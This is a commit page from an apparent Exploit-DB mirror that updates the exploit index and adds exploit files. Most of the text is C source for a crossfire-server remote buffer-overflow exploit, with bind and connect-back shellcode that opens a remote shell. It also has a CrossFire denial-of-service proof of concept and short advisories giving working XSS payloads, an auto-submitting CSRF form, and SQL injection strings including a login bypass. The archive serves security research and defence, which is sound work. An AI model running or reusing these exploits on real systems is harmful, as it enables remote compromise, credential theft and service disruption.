bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 08_17_2014

Browse source
This commit is contained in:
Offensive Security 2014-08-17 04:41:15 +00:00
parent d0601bf7bc
commit 6b6daa5f97
12 changed files with 572 additions and 439 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
files.csv
View file

@ -1275,7 +1275,7 @@ id,file,description,date,author,platform,type,port
1532,platforms/php/webapps/1532.pl,"PwsPHP <= 1.2.3 (index.php) Remote SQL Injection Exploit",2006-02-25,papipsycho,php,webapps,0
1533,platforms/php/webapps/1533.php,"4Images <= 1.7.1 (Local Inclusion) Remote Code Execution Exploit",2006-02-26,rgod,php,webapps,0
1534,platforms/sco/local/1534.c,"SCO Unixware 7.1.3 (ptrace) Local Privilege Escalation Exploit",2006-02-26,prdelka,sco,local,0
1535,platforms/windows/dos/1535.c,"CrossFire <= 1.8.0 (oldsocketmode) Remote Buffer Overflow PoC",2006-02-27,"Luigi Auriemma",windows,dos,0
1535,platforms/windows/dos/1535.c,"CrossFire <= 1.8.0 - (oldsocketmode) Remote Buffer Overflow PoC",2006-02-27,"Luigi Auriemma",windows,dos,0
1536,platforms/windows/remote/1536.pm,"MS Internet Explorer 6.0 SP0 IsComponentInstalled() Remote Exploit",2006-02-28,"H D Moore",windows,remote,0
1537,platforms/windows/remote/1537.pm,"Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow",2006-02-28,y0,windows,remote,44334
1538,platforms/php/webapps/1538.pl,"farsinews <= 2.5 - Directory Traversal arbitrary (users.db) access exploit",2006-02-28,Hessam-x,php,webapps,0
@ -1320,7 +1320,7 @@ id,file,description,date,author,platform,type,port
1578,platforms/linux/remote/1578.c,"PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit (2)",2006-03-12,darkeagle,linux,remote,7144
1579,platforms/linux/local/1579.pl,"Ubuntu Breezy 5.10 Installer Password Disclosure Vulnerability",2006-03-12,"Kristian Hermansen",linux,local,0
1581,platforms/php/webapps/1581.pl,"Simple PHP Blog <= 0.4.7.1 - Remote Command Execution Exploit",2006-03-13,rgod,php,webapps,0
1582,platforms/linux/remote/1582.c,"crossfire-server <= 1.9.0 SetUp() Remote Buffer Overflow Exploit",2006-03-13,landser,linux,remote,13327
1582,platforms/linux/remote/1582.c,"crossfire-server <= 1.9.0 - SetUp() Remote Buffer Overflow Exploit",2006-03-13,landser,linux,remote,13327
1583,platforms/osx/remote/1583.pl,"Apple Mac OS X 10.4.5 Mail.app (Real Name) Buffer Overflow Exploit",2006-03-13,"Kevin Finisterre",osx,remote,25
1584,platforms/windows/local/1584.cpp,"MS Windows Telephony Service Command Execution Exploit (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local,0
1585,platforms/php/webapps/1585.php,"php iCalendar <= 2.21 (Cookie) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0
@ -30924,3 +30924,12 @@ id,file,description,date,author,platform,type,port
34334,platforms/win64/remote/34334.rb,"VirtualBox 3D Acceleration Virtual Machine Escape",2014-08-14,metasploit,win64,remote,0
34335,platforms/linux/remote/34335.rb,"VMTurbo Operations Manager 4.6 vmtadmin.cgi Remote Command Execution",2014-08-14,metasploit,linux,remote,80
34336,platforms/php/webapps/34336.html,"Disqus for Wordpress 2.7.5 Admin Stored CSRF and XSS",2014-08-14,"Nik Cubrilovic",php,webapps,80
34337,platforms/php/webapps/34337.txt,"Gekko Web Builder 9.0 'index.php' Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
34338,platforms/php/webapps/34338.html,"Pixie 1.0.4 HTML Injection and Cross-Site Scripting Vulnerabilities",2010-07-15,"High-Tech Bridge SA",php,webapps,0
34339,platforms/php/webapps/34339.txt,"Pligg 1.0.4 'search.php' Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service Vulnerability",2010-07-15,"Luigi Auriemma",multiple,dos,0
34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 SQL Injection and HTML Injection Vulnerabilities",2009-09-21,learn3r,php,webapps,0
34342,platforms/php/webapps/34342.txt,"Ez Poll Hoster Multiple Cross Site Scripting Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0
34343,platforms/asp/webapps/34343.txt,"MOJO IWMS 7 'default.asp' Cookie Manipulation Vulnerability",2007-12-17,"cp77fk4r ",asp,webapps,0
34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET Multiple SQL Injection Vulnerabilities",2009-12-17,bi0,asp,webapps,0
34345,platforms/java/webapps/34345.txt,"jCore 'search' Parameter Cross Site Scripting Vulnerability",2009-12-17,loneferret,java,webapps,0

Can't render this file because it is too large.

11
platforms/asp/webapps/34343.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/41746/info
MOJO IWMS is prone to a cookie-manipulation vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this vulnerability could allow an attacker to masquerade as another user. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
MOJO IWMS 7 is vulnerable; other versions may also be affected.
The following example URI is available:
http://www.example.com/upload/default.asp?mode=wrong&ERRMSG=%3Cmeta+http-equiv='Set-cookie'+content='[Cookie-Name]=[Cookie-Value]'%3E

10
platforms/asp/webapps/34344.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/41747/info
Pre Jobo.NET is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example data is available:
User : 1'or'1'='1
Pass : 1'or'1'='1

7
platforms/java/webapps/34345.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/41748/info
jCore is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/modules/search?search=</a><input value="xss" onclick="alert(1)" type="submit">

416
platforms/linux/remote/1582.c
View file

@ -1,208 +1,208 @@
// crossfire-server <= 1.9.0 "SetUp()" remote buffer overflow
//
// exploit by landser - ihsahn at gmail com
// vote http://shinui.org.il
//
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#define PORT 13327 // default port
#define SC_PORT 33333 // default shellcode port
#define SC_HOST "127.0.0.1" // default shellcode host
unsigned char sc_cb[] = // izik's
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
"\x80\x5b\x5d\xbeHOST\xf7\xd6\x56\x66\xbdPR\x0f\xcd\x09\xdd"
"\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"
"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";
unsigned char sc_bind[] = // izik's
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
"\x80\x5b\x5d\x52\x66\xbdPR\x0f\xcd\x09\xdd\x55\x6a\x10\x51"
"\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5f"
"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x93\xb0\x02\xcd"
"\x80\x85\xc0\x75\x1a\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
"\x53\xeb\xb2\x6a\x06\x58\xcd\x80\xb3\x04\xeb\xc9";
struct {
const char *type;
unsigned char *code;
} shellcodes[] = {
{"bind", sc_bind},
{"connectback", sc_cb},
};
struct {
const char *ver;
unsigned long ret; // a "jmp *%eax" instruction
unsigned short int len;
} targets[] = {
{"crossfire-server_1.6.0.dfsg.1-4_i386.deb", 0x080d6f48, 0x1028},
{"crossfire-server_1.8.0-2_i386.deb", 0x080506d7, 0x1130},
{"crossfire-server_1.9.0-1_i386.deb", 0x0807aefa, 0x1130},
{"crash", 0xcccccccc, 0x1300},
};
#define structsize(x) (sizeof x / sizeof x[0])
int s;
int n = -1;
unsigned char *sc = sc_bind; // default shellcode
unsigned char buf[0x2000];
void establish (char *, int);
void usage (char *);
void update (unsigned char *, int, char *);
void writebuf (void);
int main (int argc, char **argv) {
int port = 0; // default value
unsigned short int sc_port = 0;
char *sc_host = NULL;
printf("cf190.c by landser - ihsahn at gmail com\n\n");
char c;
while ((c = getopt(argc, argv, "t:p:h:d:s:")) != -1) {
switch (c) {
case 's': sc = shellcodes[atoi(optarg)].code; break;
case 'h': sc_host = strdup(optarg); break;
case 'd': sc_port = atoi(optarg); break;
case 't': n = atoi(optarg); break;
case 'p': port = atoi(optarg); break;
case '?': usage(argv[0]); return EXIT_FAILURE;
}
}
if ((n < 0) || (n >= structsize(targets))) {
printf("invalid target\n");
usage(argv[0]);
return EXIT_FAILURE;
}
if ((optind + 1) != argc) {
printf("no hostname\n");
usage(argv[0]);
return EXIT_FAILURE;
}
establish(argv[optind], port ? port : PORT);
update(sc, sc_port, sc_host);
writebuf();
printf("> sending\n");
if (send(s, buf, targets[n].len + 2, 0) < 0) {
perror("send()");
return EXIT_FAILURE;
}
usleep(100000);
printf("> done\n");
close(s);
return EXIT_SUCCESS;
}
void establish (char *ip, int port) {
struct sockaddr_in sa;
struct hostent *h;
if (!(h = gethostbyname(ip))) {
herror("gethostbyname()");
exit(EXIT_FAILURE);
}
printf("> resolved %s to %s\n", ip,
inet_ntoa(**((struct in_addr **)h->h_addr_list)));
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **)h->h_addr_list);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket()");
exit(EXIT_FAILURE);
}
if (connect(s, (struct sockaddr *)&sa, sizeof(struct sockaddr)) < 0) {
perror("connect()");
exit(EXIT_FAILURE);
}
printf ("> connected to %s:%d.\n", inet_ntoa(**((struct in_addr **)h->h_addr_list)), port);
}
void usage (char *argv0) {
int i;
printf("usage: %s -t <target> [-s <shellcode>] "
"[-d <connectback/bind port] [-h <connectback ip>] "
"host [-p <port>]\n", argv0);
printf("- targets:\n");
for (i=0;i<structsize(targets);i++)
printf("%d. %s\n", i, targets[i].ver);
printf("- shellcodes: (default 0)\n");
for (i=0;i<structsize(shellcodes);i++)
printf("%d. %s\n", i, shellcodes[i].type);
}
void update (unsigned char *code, int port, char *host) {
if (!port) port = SC_PORT;
if (!(port & 0xff) || !((port >> 8) & 0xff)) {
printf("bad cb port\n");
exit(EXIT_FAILURE);
}
*(unsigned short int *)(strstr(code, "PR")) = port;
if (strstr(code, "HOST")) {
in_addr_t inaddr;
if (!host) host = SC_HOST;
inaddr = inet_addr(host);
if (inaddr == INADDR_NONE || strstr(host, "255")) {
// ~(255) is 0
printf("invalid cb hostname\n");
exit(EXIT_FAILURE);
}
*(in_addr_t *)(strstr(code, "HOST")) = ~inaddr;
}
if (host) free(host);
}
void writebuf (void) {
unsigned char *ptr = buf;
memset(buf, 0x90, sizeof buf);
*ptr++ = (targets[n].len>> 8) & 0xff;
*ptr++ = targets[n].len & 0xff;
memcpy(ptr, "setup sound ", strlen("setup sound "));
ptr += strlen("setup sound ");
ptr += 120; // leave 120 nops before the shellcode
memcpy(ptr, sc, strlen(sc));
ptr = &buf[targets[n].len - 10];
*(unsigned long *)ptr = targets[n].ret;
}
// milw0rm.com [2006-03-13]
// crossfire-server <= 1.9.0 "SetUp()" remote buffer overflow
//
// exploit by landser - ihsahn at gmail com
// vote http://shinui.org.il
//
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#define PORT 13327 // default port
#define SC_PORT 33333 // default shellcode port
#define SC_HOST "127.0.0.1" // default shellcode host
unsigned char sc_cb[] = // izik's
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
"\x80\x5b\x5d\xbeHOST\xf7\xd6\x56\x66\xbdPR\x0f\xcd\x09\xdd"
"\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"
"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";
unsigned char sc_bind[] = // izik's
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd"
"\x80\x5b\x5d\x52\x66\xbdPR\x0f\xcd\x09\xdd\x55\x6a\x10\x51"
"\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5f"
"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x93\xb0\x02\xcd"
"\x80\x85\xc0\x75\x1a\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
"\x53\xeb\xb2\x6a\x06\x58\xcd\x80\xb3\x04\xeb\xc9";
struct {
const char *type;
unsigned char *code;
} shellcodes[] = {
{"bind", sc_bind},
{"connectback", sc_cb},
};
struct {
const char *ver;
unsigned long ret; // a "jmp *%eax" instruction
unsigned short int len;
} targets[] = {
{"crossfire-server_1.6.0.dfsg.1-4_i386.deb", 0x080d6f48, 0x1028},
{"crossfire-server_1.8.0-2_i386.deb", 0x080506d7, 0x1130},
{"crossfire-server_1.9.0-1_i386.deb", 0x0807aefa, 0x1130},
{"crash", 0xcccccccc, 0x1300},
};
#define structsize(x) (sizeof x / sizeof x[0])
int s;
int n = -1;
unsigned char *sc = sc_bind; // default shellcode
unsigned char buf[0x2000];
void establish (char *, int);
void usage (char *);
void update (unsigned char *, int, char *);
void writebuf (void);
int main (int argc, char **argv) {
int port = 0; // default value
unsigned short int sc_port = 0;
char *sc_host = NULL;
printf("cf190.c by landser - ihsahn at gmail com\n\n");
char c;
while ((c = getopt(argc, argv, "t:p:h:d:s:")) != -1) {
switch (c) {
case 's': sc = shellcodes[atoi(optarg)].code; break;
case 'h': sc_host = strdup(optarg); break;
case 'd': sc_port = atoi(optarg); break;
case 't': n = atoi(optarg); break;
case 'p': port = atoi(optarg); break;
case '?': usage(argv[0]); return EXIT_FAILURE;
}
}
if ((n < 0) || (n >= structsize(targets))) {
printf("invalid target\n");
usage(argv[0]);
return EXIT_FAILURE;
}
if ((optind + 1) != argc) {
printf("no hostname\n");
usage(argv[0]);
return EXIT_FAILURE;
}
establish(argv[optind], port ? port : PORT);
update(sc, sc_port, sc_host);
writebuf();
printf("> sending\n");
if (send(s, buf, targets[n].len + 2, 0) < 0) {
perror("send()");
return EXIT_FAILURE;
}
usleep(100000);
printf("> done\n");
close(s);
return EXIT_SUCCESS;
}
void establish (char *ip, int port) {
struct sockaddr_in sa;
struct hostent *h;
if (!(h = gethostbyname(ip))) {
herror("gethostbyname()");
exit(EXIT_FAILURE);
}
printf("> resolved %s to %s\n", ip,
inet_ntoa(**((struct in_addr **)h->h_addr_list)));
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **)h->h_addr_list);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
perror("socket()");
exit(EXIT_FAILURE);
}
if (connect(s, (struct sockaddr *)&sa, sizeof(struct sockaddr)) < 0) {
perror("connect()");
exit(EXIT_FAILURE);
}
printf ("> connected to %s:%d.\n", inet_ntoa(**((struct in_addr **)h->h_addr_list)), port);
}
void usage (char *argv0) {
int i;
printf("usage: %s -t <target> [-s <shellcode>] "
"[-d <connectback/bind port] [-h <connectback ip>] "
"host [-p <port>]\n", argv0);
printf("- targets:\n");
for (i=0;i<structsize(targets);i++)
printf("%d. %s\n", i, targets[i].ver);
printf("- shellcodes: (default 0)\n");
for (i=0;i<structsize(shellcodes);i++)
printf("%d. %s\n", i, shellcodes[i].type);
}
void update (unsigned char *code, int port, char *host) {
if (!port) port = SC_PORT;
if (!(port & 0xff) || !((port >> 8) & 0xff)) {
printf("bad cb port\n");
exit(EXIT_FAILURE);
}
*(unsigned short int *)(strstr(code, "PR")) = port;
if (strstr(code, "HOST")) {
in_addr_t inaddr;
if (!host) host = SC_HOST;
inaddr = inet_addr(host);
if (inaddr == INADDR_NONE || strstr(host, "255")) {
// ~(255) is 0
printf("invalid cb hostname\n");
exit(EXIT_FAILURE);
}
*(in_addr_t *)(strstr(code, "HOST")) = ~inaddr;
}
if (host) free(host);
}
void writebuf (void) {
unsigned char *ptr = buf;
memset(buf, 0x90, sizeof buf);
*ptr++ = (targets[n].len>> 8) & 0xff;
*ptr++ = targets[n].len & 0xff;
memcpy(ptr, "setup sound ", strlen("setup sound "));
ptr += strlen("setup sound ");
ptr += 120; // leave 120 nops before the shellcode
memcpy(ptr, sc, strlen(sc));
ptr = &buf[targets[n].len - 10];
*(unsigned long *)ptr = targets[n].ret;
}
// milw0rm.com [2006-03-13]

22
platforms/multiple/dos/34340.txt Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/41737/info
Unreal Engine is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected server, resulting in denial-of-service conditions.
The following games which are developed with Unreal Engine are affected:
Rainbow Six: Raven Shield
Deus Ex
Land of the Dead
Postal 2
Rune
Shadow Ops
Unreal 2
Unreal Tournament
Unreal Tournament 2003
WarPath
XIII
Other games may also be affected.
http://www.exploit-db.com/sploits/34340.zip

9
platforms/php/webapps/34337.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41726/info
Gekko Web Builder is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Gekko Web Builder 0.90 ALPHA is vulnerable; prior versions may be affected.
http://www.example.com/admin/index.php?app=settings"><script>alert(document.cookie)</script>

36
platforms/php/webapps/34338.html Executable file
View file

@ -0,0 +1,36 @@
source: http://www.securityfocus.com/bid/41727/info
Pixie is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
Pixie 1.0.4 is vulnerable; other versions may also be affected.
<form accept-charset="UTF-8" action="http://www.example.com/admin/index.php?s=settings&x=pixie" method="post" name="main" >
<input type="hidden" name="langu" value="en-gb" />
<input type="hidden" name="time_zone" value="+0" />
<input type="hidden" name="dstime" value="no" />
<input type="hidden" name="dateformat" value="%Oe %B %Y, %H:%M" />
<input type="hidden" name="rte" value="1" />
<input type="hidden" name="logs" value="5" />
<input type="hidden" name="sysmess" value=&#039;hello message"><script>alert(document.cookie)</script>&#039; />
<input type="submit" name="settings_edit" id="form_addedit_submit" value="Update" />
</form>
<script>
document.getElementById(&#039;form_addedit_submit&#039;).click();
</script>
<form accept-charset="UTF-8" action="http://www.example.com/admin/index.php?s=settings&x=site" method="post" name="main" >
<input type="hidden" name="sitename" value="Pixie" />
<input type="hidden" name="url" value="http://host/" />
<input type="hidden" name="default" value="blog/" />
<input type="hidden" name="keywords" value=&#039;key1"><script>alert(document.cookie)</script>&#039; />
<input type="hidden" name="site_auth" value="sute author" />
<input type="hidden" name="site_cright" value="copyright" />
<input type="hidden" name="cleanurls" value="yes" />
<input type="submit" name="settings_edit" id="form_addedit_submit" value="Update" />
</form>
<script>
document.getElementById(&#039;form_addedit_submit&#039;).click();
</script>

9
platforms/php/webapps/34339.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41729/info
Pligg is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Pligg 1.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/search/1"><script>alert(document.cookie)</script>

9
platforms/php/webapps/34341.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/41741/info
WX-Guestbook is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
WX-Guestbook version 1.1.208 is affected; other versions may also be affected.
test%') UNION ALL SELECT 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/*

11
platforms/php/webapps/34342.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/41742/info
Ez Poll Hoster is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following example URIs are available:
http://www.example.com/eph/index.php?action=code&pid=[XSS]
http://www.example.com/eph/profile.php?action=view&uid=[XSS]

458
platforms/windows/dos/1535.c
View file

@ -1,229 +1,229 @@
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
/*
Header file used for manage errors in Windows
It support socket and errno too
(this header replace the previous sock_errX.h)
*/
#include <string.h>
#include <errno.h>
void std_err(void) {
char *error;
switch(WSAGetLastError()) {
case 10004: error = "Interrupted system call"; break;
case 10009: error = "Bad file number"; break;
case 10013: error = "Permission denied"; break;
case 10014: error = "Bad address"; break;
case 10022: error = "Invalid argument (not bind)"; break;
case 10024: error = "Too many open files"; break;
case 10035: error = "Operation would block"; break;
case 10036: error = "Operation now in progress"; break;
case 10037: error = "Operation already in progress"; break;
case 10038: error = "Socket operation on non-socket"; break;
case 10039: error = "Destination address required"; break;
case 10040: error = "Message too long"; break;
case 10041: error = "Protocol wrong type for socket"; break;
case 10042: error = "Bad protocol option"; break;
case 10043: error = "Protocol not supported"; break;
case 10044: error = "Socket type not supported"; break;
case 10045: error = "Operation not supported on socket"; break;
case 10046: error = "Protocol family not supported"; break;
case 10047: error = "Address family not supported by protocol family"; break;
case 10048: error = "Address already in use"; break;
case 10049: error = "Can't assign requested address"; break;
case 10050: error = "Network is down"; break;
case 10051: error = "Network is unreachable"; break;
case 10052: error = "Net dropped connection or reset"; break;
case 10053: error = "Software caused connection abort"; break;
case 10054: error = "Connection reset by peer"; break;
case 10055: error = "No buffer space available"; break;
case 10056: error = "Socket is already connected"; break;
case 10057: error = "Socket is not connected"; break;
case 10058: error = "Can't send after socket shutdown"; break;
case 10059: error = "Too many references, can't splice"; break;
case 10060: error = "Connection timed out"; break;
case 10061: error = "Connection refused"; break;
case 10062: error = "Too many levels of symbolic links"; break;
case 10063: error = "File name too long"; break;
case 10064: error = "Host is down"; break;
case 10065: error = "No Route to Host"; break;
case 10066: error = "Directory not empty"; break;
case 10067: error = "Too many processes"; break;
case 10068: error = "Too many users"; break;
case 10069: error = "Disc Quota Exceeded"; break;
case 10070: error = "Stale NFS file handle"; break;
case 10091: error = "Network SubSystem is unavailable"; break;
case 10092: error = "WINSOCK DLL Version out of range"; break;
case 10093: error = "Successful WSASTARTUP not yet performed"; break;
case 10071: error = "Too many levels of remote in path"; break;
case 11001: error = "Host not found"; break;
case 11002: error = "Non-Authoritative Host not found"; break;
case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
case 11004: error = "Valid name, no data record of requested type"; break;
default: error = strerror(errno); break;
}
fprintf(stderr, "\nError: %s\n", error);
exit(1);
}
#define close closesocket
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#endif
#define VER "0.1"
#define PORT 13327
#define MAXSOCKBUF 10240
#define BUFFSZ (MAXSOCKBUF + 256)
int readline(int sd, u_char *data, int size);
u_int resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len;
u_short port = PORT;
u_char buff[BUFFSZ];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
srand(time(NULL));
setbuf(stdout, NULL);
fputs("\n"
"CrossFire <= 1.8.0 oldsocketmode buffer-overflow "VER"\n"
"bug found by the developers and indipendently by me... but too late\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%hu)]\n"
"\n", argv[0], port);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
printf("- connect...");
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
printf(" done\n");
printf("- receive server version:\n");
len = readline(sd, buff, sizeof(buff));
if(len < 0) std_err();
printf(" %s\n", !buff[0] ? buff + 2 : buff);
printf("- activate oldsocketmode\n");
if(send(sd, "oldsocketmode", 13, 0)
< 0) std_err();
printf("- send %d bytes, the server supports max %d\n", sizeof(buff), MAXSOCKBUF);
memset(buff, 'a', sizeof(buff));
if(send(sd, buff, sizeof(buff), 0)
< 0) std_err();
len = readline(sd, buff, sizeof(buff));
sleep(ONESEC); // needed in my localhost server or it terminates!
close(sd);
printf("- check server:");
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
printf("\n Server IS vulnerable!!!\n\n");
} else {
printf("\n Server does not seem vulnerable\n\n");
}
close(sd);
return(0);
}
int readline(int sd, u_char *data, int size) {
int i;
size--;
for(i = 0; i < size; i++) {
if(recv(sd, data, 1, 0) <= 0) return(-1);
if(*data == '\n') break;
data++;
}
*data = 0;
return(i);
}
u_int resolv(char *host) {
struct hostent *hp;
u_int host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_int *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
// milw0rm.com [2006-02-27]
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
/*
Header file used for manage errors in Windows
It support socket and errno too
(this header replace the previous sock_errX.h)
*/
#include <string.h>
#include <errno.h>
void std_err(void) {
char *error;
switch(WSAGetLastError()) {
case 10004: error = "Interrupted system call"; break;
case 10009: error = "Bad file number"; break;
case 10013: error = "Permission denied"; break;
case 10014: error = "Bad address"; break;
case 10022: error = "Invalid argument (not bind)"; break;
case 10024: error = "Too many open files"; break;
case 10035: error = "Operation would block"; break;
case 10036: error = "Operation now in progress"; break;
case 10037: error = "Operation already in progress"; break;
case 10038: error = "Socket operation on non-socket"; break;
case 10039: error = "Destination address required"; break;
case 10040: error = "Message too long"; break;
case 10041: error = "Protocol wrong type for socket"; break;
case 10042: error = "Bad protocol option"; break;
case 10043: error = "Protocol not supported"; break;
case 10044: error = "Socket type not supported"; break;
case 10045: error = "Operation not supported on socket"; break;
case 10046: error = "Protocol family not supported"; break;
case 10047: error = "Address family not supported by protocol family"; break;
case 10048: error = "Address already in use"; break;
case 10049: error = "Can't assign requested address"; break;
case 10050: error = "Network is down"; break;
case 10051: error = "Network is unreachable"; break;
case 10052: error = "Net dropped connection or reset"; break;
case 10053: error = "Software caused connection abort"; break;
case 10054: error = "Connection reset by peer"; break;
case 10055: error = "No buffer space available"; break;
case 10056: error = "Socket is already connected"; break;
case 10057: error = "Socket is not connected"; break;
case 10058: error = "Can't send after socket shutdown"; break;
case 10059: error = "Too many references, can't splice"; break;
case 10060: error = "Connection timed out"; break;
case 10061: error = "Connection refused"; break;
case 10062: error = "Too many levels of symbolic links"; break;
case 10063: error = "File name too long"; break;
case 10064: error = "Host is down"; break;
case 10065: error = "No Route to Host"; break;
case 10066: error = "Directory not empty"; break;
case 10067: error = "Too many processes"; break;
case 10068: error = "Too many users"; break;
case 10069: error = "Disc Quota Exceeded"; break;
case 10070: error = "Stale NFS file handle"; break;
case 10091: error = "Network SubSystem is unavailable"; break;
case 10092: error = "WINSOCK DLL Version out of range"; break;
case 10093: error = "Successful WSASTARTUP not yet performed"; break;
case 10071: error = "Too many levels of remote in path"; break;
case 11001: error = "Host not found"; break;
case 11002: error = "Non-Authoritative Host not found"; break;
